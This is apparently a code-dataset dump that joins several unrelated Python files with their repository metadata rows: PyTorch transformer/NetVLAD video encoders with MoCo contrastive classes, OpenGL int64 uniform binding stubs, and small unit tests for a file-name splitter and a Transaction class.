# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_MAX(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_MAX, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.pool = nn.MaxPool1d(2, stride=2)
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
# Pooling ( N, output_dim /2)
output_f = torch.unsqueeze(output_f, 1)
output_f = self.pool(output_f)
output_f = torch.squeeze(output_f,1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# Pooling ( N, output_dim /2)
output_t = torch.unsqueeze(output_t, 1)
output_t = self.pool(output_t)
output_t = torch.squeeze(output_t,1)
# Pooling ( N, output_dim /2)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_NetVLAD_AUX(nn.Module):
def __init__(self, feature_size=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1, netvlad_clusters=64, netvlad_output_dim=1024):
super(CTCA_NetVLAD_AUX, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers,nn.LayerNorm(self.feature_size))
self.netvlad = NetVLAD(self.feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
## NetVLAD Embedding
output = output.unsqueeze(2).permute(0, 3, 1, 2)
output = self.netvlad(output, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
v_embedding = F.normalize(output, p=2, dim=1)
return v_embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
## Transformer Embedding
# print(output.shape)
t_out = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
t_out = torch.sum(t_out, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
t_embedding = F.normalize(t_out, p=2, dim=1)
## NetVLAD Embedding
output = output.unsqueeze(2).permute(0, 3, 1, 2)
output = self.netvlad(output, mask=frame_mask)
# L2 normalize (N, output_dim) IMPORTANT!!!
v_embedding = F.normalize(output, p=2, dim=1)
return t_embedding, v_embedding
class CTCA_NetVLAD(nn.Module):
def __init__(self, feature_size=2048, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1, netvlad_clusters=64, netvlad_output_dim=1024):
super(CTCA_NetVLAD, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.feedforward = feedforward
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=self.feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers,nn.LayerNorm(self.feature_size))
self.netvlad = NetVLAD(self.feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output.unsqueeze(2).permute(0, 3, 1, 2) # (N, C, T, 1)
# breakpoint()
output = self.netvlad(output, mask=frame_mask) # (N, out_dims)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
class TCA(nn.Module):
def __init__(self, feature_size=1024, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(TCA, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=4096,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
if self.mlp is not None:
embedding = self.mlp(embedding)
# breakpoint()
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
class simple_MLP(nn.Module):
def __init__(self, dims):
super(simple_MLP, self).__init__()
self.layers = nn.Sequential(
nn.Linear(dims[0], dims[1]),
nn.ReLU(),
nn.Linear(dims[1], dims[2])
)
def forward(self, x):
if len(x.shape) == 1:
x = x.view(x.size(0), -1)
x = self.layers(x)
return x
class MoCo(nn.Module):
"""
Build a MoCo model with: a query encoder, a key encoder, and a queue
https://arxiv.org/abs/1911.05722
"""
def __init__(self, base_encoder, dim=1024, K=65536, m=0.999, T=0.07, mlp=False):
"""
dim: feature dimension (default: 1024)
K: queue size; number of negative keys (default: 65536)
m: moco momentum of updating key encoder (default: 0.999)
T: softmax temperature (default: 0.07)
"""
super(MoCo, self).__init__()
self.K = K
self.m = m
self.T = T
# create the encoders
self.encoder_q = base_encoder
self.encoder_k = copy.deepcopy(self.encoder_q)
self.is_mlp = mlp
if self.is_mlp: # hack: brute-force replacement
self.encoder_q.mlp = simple_MLP([1024,1024,1024])
self.encoder_k.mlp = simple_MLP([1024,1024,1024])
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
# create the queue
self.register_buffer("queue", torch.randn(dim, K))
self.queue = F.normalize(self.queue, dim=0)
self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long))
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""
Momentum update of the key encoder
"""
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@torch.no_grad()
def _dequeue_and_enqueue(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr[0] = ptr
def forward(self, a, p, n, len_a, len_p, len_n):
"""
Input:
a: a batch of anchor logits
p: a batch of positive logits
n: a bigger batch of negative logits
Output:
logits, targets
"""
if len(n.size()) > 3:
n = n.view(-1, n.size()[2], n.size()[3])
len_n = len_n.view(-1, 1)
# compute query features
q = self.encoder_q(a, len_a) # queries: NxC
q = F.normalize(q, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
p = self.encoder_k(p, len_p) # anchors: NxC
p = F.normalize(p, dim=1)
k = self.encoder_k(n, len_n) # keys: kNxC
k = F.normalize(k, dim=1)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos = torch.einsum('nc,nc->n', [q, p]).unsqueeze(-1)
# negative logits: NxK
# breakpoint()
l_neg = torch.einsum('nc,ck->nk', [q, self.queue.clone().detach()])
# print(p.shape,q.shape,self.queue.clone().shape)
# print(l_pos.shape, l_neg.shape)
# logits: Nx(1+K)
logits = torch.cat([l_pos, l_neg], dim=1)
# apply temperature
logits /= self.T
# labels: positive key indicators
labels = torch.zeros(logits.shape[0], dtype=torch.long).cuda()
# dequeue and enqueue
self._dequeue_and_enqueue(k)
return logits, labels
class MoCoAUX(nn.Module):
"""
Build a MoCo model with: a query encoder, a key encoder, and a queue
https://arxiv.org/abs/1911.05722
"""
def __init__(self, base_encoder, t_dim=1024, v_dim=1024, K=65536, m=0.999, T=0.07, mlp=False):
"""
dim: feature dimension (default: 1024)
K: queue size; number of negative keys (default: 65536)
m: moco momentum of updating key encoder (default: 0.999)
T: softmax temperature (default: 0.07)
"""
super(MoCoAUX, self).__init__()
self.K = K
self.m = m
self.T = T
# create the encoders
self.encoder_q = base_encoder
self.encoder_k = copy.deepcopy(self.encoder_q)
self.is_mlp = mlp
if self.is_mlp: # hack: brute-force replacement
pass
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data.copy_(param_q.data) # initialize
param_k.requires_grad = False # not update by gradient
# create the queue
self.register_buffer("queue_t", torch.randn(t_dim, K))
self.register_buffer("queue_v", torch.randn(v_dim, K))
self.queue_t = F.normalize(self.queue_t, dim=0)
self.queue_v = F.normalize(self.queue_v, dim=0)
self.register_buffer("queue_ptr_t", torch.zeros(1, dtype=torch.long))
self.register_buffer("queue_ptr_v", torch.zeros(1, dtype=torch.long))
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""
Momentum update of the key encoder
"""
for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):
param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)
@torch.no_grad()
def _dequeue_and_enqueue_t(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr_t)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue_t[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr_t[0] = ptr
@torch.no_grad()
def _dequeue_and_enqueue_v(self, keys):
# gather keys before updating queue
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr_v)
assert self.K % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue_v[:, ptr:ptr + batch_size] = keys.T
ptr = (ptr + batch_size) % self.K # move pointer
self.queue_ptr_v[0] = ptr
def forward(self, a, p, n, len_a, len_p, len_n):
"""
Input:
a: a batch of anchor logits
p: a batch of positive logits
n: a bigger batch of negative logits
Output:
logits, targets
"""
if len(n.size()) > 3:
n = n.view(-1, n.size()[2], n.size()[3])
len_n = len_n.view(-1, 1)
# compute query features
q_t, q_v = self.encoder_q.encode(a, len_a) # queries: NxC
q_t = F.normalize(q_t, dim=1)
q_v = F.normalize(q_v, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
p_t,p_v = self.encoder_k.encode(p, len_p) # anchors: NxC
p_t = F.normalize(p_t, dim=1)
p_v = F.normalize(p_v, dim=1)
k_t,k_v = self.encoder_k.encode(n, len_n) # keys: kNxC
k_t = F.normalize(k_t, dim=1)
k_v = F.normalize(k_v, dim=1)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos_t = torch.einsum('nc,nc->n', [q_t, p_t]).unsqueeze(-1)
l_pos_v = torch.einsum('mc,mc->m', [q_v, p_v]).unsqueeze(-1)
# negative logits: NxK
l_neg_t = torch.einsum('nc,ck->nk', [q_t, self.queue_t.clone().detach()])
l_neg_v = torch.einsum('md,dl->ml', [q_v, self.queue_v.clone().detach()])
# print(p.shape,q.shape,self.queue.clone().shape)
# print(l_pos.shape, l_neg.shape)
# logits: Nx(1+K)
logits_t = torch.cat([l_pos_t, l_neg_t], dim=1)
logits_v = torch.cat([l_pos_v, l_neg_v], dim=1)
# apply temperature
logits_t /= self.T
logits_v /= self.T
# labels: positive key indicators
labels = torch.zeros(logits_t.shape[0], dtype=torch.long).cuda()
# dequeue and enqueue
self._dequeue_and_enqueue_t(k_t)
self._dequeue_and_enqueue_v(k_v)
return logits_t, logits_v, labels
@torch.no_grad()
def concat_all_gather(tensor):
"""
Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
return hvd.allgather(tensor.contiguous())
| 39.296241
| 189
| 0.595416
| 10,803
| 79,457
| 4.168749
| 0.032306
| 0.072055
| 0.006462
| 0.023093
| 0.927567
| 0.915399
| 0.896969
| 0.889575
| 0.883557
| 0.876651
| 0
| 0.027532
| 0.278666
| 79,457
| 2,021
| 190
| 39.315685
| 0.758213
| 0.207244
| 0
| 0.780998
| 0
| 0
| 0.022678
| 0
| 0
| 0
| 0
| 0
| 0.02496
| 1
| 0.05153
| false
| 0.000805
| 0.007246
| 0
| 0.10306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96c4771f591a1211ce3852f23686ca8d634347ab
| 115
|
py
|
Python
|
funcs/__init__.py
|
cartemic/Research-Scripts
|
41977727f724a607fabe3b69714db692752b5ac4
|
[
"MIT"
] | null | null | null |
funcs/__init__.py
|
cartemic/Research-Scripts
|
41977727f724a607fabe3b69714db692752b5ac4
|
[
"MIT"
] | 3
|
2020-05-08T17:33:26.000Z
|
2022-03-31T04:34:53.000Z
|
funcs/__init__.py
|
cartemic/Research-Scripts
|
41977727f724a607fabe3b69714db692752b5ac4
|
[
"MIT"
] | 1
|
2019-05-09T21:01:16.000Z
|
2019-05-09T21:01:16.000Z
|
from . import dir, plots, post_processing, simulation
__all__ = ["dir", "plots", "post_processing", "simulation"]
| 28.75
| 59
| 0.721739
| 13
| 115
| 5.923077
| 0.615385
| 0.207792
| 0.311688
| 0.571429
| 0.831169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 115
| 3
| 60
| 38.333333
| 0.762376
| 0
| 0
| 0
| 0
| 0
| 0.286957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c23f2d92e1460ec7923e480c04776bd4ebc4684
| 242
|
py
|
Python
|
tests/test_utils.py
|
humanconnectome/pipeline-runner
|
af8c7f2a23bcdd701cd62e0eeb7071e524031ae0
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
humanconnectome/pipeline-runner
|
af8c7f2a23bcdd701cd62e0eeb7071e524031ae0
|
[
"MIT"
] | 8
|
2020-08-27T02:09:20.000Z
|
2020-08-27T11:37:57.000Z
|
tests/test_utils.py
|
humanconnectome/pipeline-runner
|
af8c7f2a23bcdd701cd62e0eeb7071e524031ae0
|
[
"MIT"
] | 1
|
2021-11-18T17:47:42.000Z
|
2021-11-18T17:47:42.000Z
|
from prunner.util.convert import split_file_component
def test_split_file_component():
assert split_file_component("Just content") == ("Just content", None)
assert split_file_component("Filename#Content") == ("Content", "Filename")
| 34.571429
| 78
| 0.760331
| 30
| 242
| 5.833333
| 0.5
| 0.205714
| 0.411429
| 0.274286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115702
| 242
| 6
| 79
| 40.333333
| 0.817757
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ff307a7c8fd4f66c1b2f077e44028ad36e90232
| 4,309
|
py
|
Python
|
OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/ARB/gpu_shader_int64.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
from OpenGLCffi.GL import params
@params(api='gl', prms=['location', 'x'])
def glUniform1i64ARB(location, x):
pass
@params(api='gl', prms=['location', 'x', 'y'])
def glUniform2i64ARB(location, x, y):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z'])
def glUniform3i64ARB(location, x, y, z):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z', 'w'])
def glUniform4i64ARB(location, x, y, z, w):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform1i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform2i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform3i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform4i64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'x'])
def glUniform1ui64ARB(location, x):
pass
@params(api='gl', prms=['location', 'x', 'y'])
def glUniform2ui64ARB(location, x, y):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z'])
def glUniform3ui64ARB(location, x, y, z):
pass
@params(api='gl', prms=['location', 'x', 'y', 'z', 'w'])
def glUniform4ui64ARB(location, x, y, z, w):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform1ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform2ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform3ui64vARB(location, count, value):
pass
@params(api='gl', prms=['location', 'count', 'value'])
def glUniform4ui64vARB(location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'params'])
def glGetUniformi64vARB(program, location, params):
pass
@params(api='gl', prms=['program', 'location', 'params'])
def glGetUniformui64vARB(program, location, params):
pass
@params(api='gl', prms=['program', 'location', 'bufSize', 'params'])
def glGetnUniformi64vARB(program, location, bufSize, params):
pass
@params(api='gl', prms=['program', 'location', 'bufSize', 'params'])
def glGetnUniformui64vARB(program, location, bufSize, params):
pass
@params(api='gl', prms=['program', 'location', 'x'])
def glProgramUniform1i64ARB(program, location, x):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y'])
def glProgramUniform2i64ARB(program, location, x, y):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z'])
def glProgramUniform3i64ARB(program, location, x, y, z):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z', 'w'])
def glProgramUniform4i64ARB(program, location, x, y, z, w):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform1i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform2i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform3i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform4i64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'x'])
def glProgramUniform1ui64ARB(program, location, x):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y'])
def glProgramUniform2ui64ARB(program, location, x, y):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z'])
def glProgramUniform3ui64ARB(program, location, x, y, z):
pass
@params(api='gl', prms=['program', 'location', 'x', 'y', 'z', 'w'])
def glProgramUniform4ui64ARB(program, location, x, y, z, w):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform1ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform2ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform3ui64vARB(program, location, count, value):
pass
@params(api='gl', prms=['program', 'location', 'count', 'value'])
def glProgramUniform4ui64vARB(program, location, count, value):
pass
| 23.675824
| 68
| 0.670225
| 525
| 4,309
| 5.500952
| 0.102857
| 0.207756
| 0.137119
| 0.186981
| 0.735457
| 0.725416
| 0.725416
| 0.714681
| 0.714681
| 0.690097
| 0
| 0.027218
| 0.113251
| 4,309
| 181
| 69
| 23.80663
| 0.728605
| 0
| 0
| 0.66055
| 0
| 0
| 0.171349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330275
| false
| 0.330275
| 0.009174
| 0
| 0.33945
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8c92a3d220ed37c75a8865fe758dfc40f5b3afc2
| 2,134
|
py
|
Python
|
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | 1
|
2015-11-05T16:39:07.000Z
|
2015-11-05T16:39:07.000Z
|
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | null | null | null |
test_balance.py
|
AbedFayyad/balance
|
6aade43637dbcd7785f55df2965486a8da20b5df
|
[
"MIT"
] | null | null | null |
#!/Library/FrameWorks/Python.framework/Versions/3.5/bin/python3
from balance import TransactionManager
from balance import Transaction
import os
import unittest
class TestTransaction(unittest.TestCase):
def test_constructor_positive_simple(self):
t = Transaction(100, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 0)
def test_constructor_negative_simple(self):
t = Transaction(-100, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 0)
def test_constructor_positive_small(self):
t = Transaction(100.01, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 1)
def test_constructor_positive_big(self):
t = Transaction(100.99, [])
self.assertEqual(t.is_negative, False)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 99)
def test_constructor_negative_small(self):
t = Transaction(-100.99, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 99)
def test_constructor_negative_big(self):
t = Transaction(-100.01, [])
self.assertEqual(t.is_negative, True)
self.assertEqual(t.dollars, 100)
self.assertEqual(t.cents, 1)
def test_string_positive_simple(self):
t = Transaction(100.01, [])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "100.01 on 1995-12-12")
def test_string_negative_simple(self):
t = Transaction(-100.01, [])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "-100.01 on 1995-12-12")
def test_string_complex(self):
t = Transaction(100, ["birthday", "toy"])
t.date = t.date.replace(1995, 12, 12)
self.assertEqual(str(t), "100.00 on 1995-12-12 #birthday #toy")
class TestTransactionManager(unittest.TestCase):
pass
if __name__ == "__main__":
unittest.main()
| 31.382353
| 71
| 0.653702
| 275
| 2,134
| 4.927273
| 0.203636
| 0.232472
| 0.212546
| 0.126199
| 0.739483
| 0.727675
| 0.704059
| 0.704059
| 0.704059
| 0.704059
| 0
| 0.078537
| 0.218369
| 2,134
| 67
| 72
| 31.850746
| 0.733813
| 0.029053
| 0
| 0.490196
| 0
| 0
| 0.045872
| 0
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.176471
| false
| 0.019608
| 0.078431
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8cd54ba8341657fdad7b120f181721a0e4fa5e8e
| 4,334
|
py
|
Python
|
